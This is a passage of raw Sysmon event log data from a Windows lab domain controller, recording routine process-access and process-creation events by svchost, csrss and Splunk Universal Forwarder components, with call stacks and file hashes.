13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:45.529{59A5CD1D-9361-6005-D104-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:46.201{59A5CD1D-9362-6005-D204-00000000A301}1364C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.138{59A5CD1D-9363-6005-D304-00000000A301}2672940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9363-6005-D304-00000000A301}2672C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:55:47.013{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 